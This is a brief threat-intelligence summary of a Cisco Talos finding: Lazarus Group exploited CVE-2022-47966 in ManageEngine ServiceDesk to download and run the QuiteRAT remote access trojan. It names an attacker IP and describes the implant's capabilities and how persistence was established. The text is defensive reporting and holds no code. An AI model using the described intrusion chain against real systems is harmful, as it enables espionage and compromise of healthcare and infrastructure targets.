Cisco Talos observed Lazarus Group compromising internet backbone infrastructure in Europe and targeting healthcare entities in the United States by exploiting CVE-2022-47966 in ManageEngine ServiceDesk. The attackers used the vulnerability shortly after public proof-of-concept code appeared to download and execute QuiteRAT from Lazarus-linked infrastructure, including IP address 146.4.21.94. QuiteRAT is a compact Qt-based remote access trojan derived from or closely related to MagicRAT, with capabilities for host fingerprinting, C2 communication, arbitrary command execution through cmd.exe, sleep control, and secondary C2 retrieval. Persistence was not built into the implant and was instead established through a service-creation command issued by the operators, while its Qt framework use complicates human analysis and weakens some heuristic detection approaches.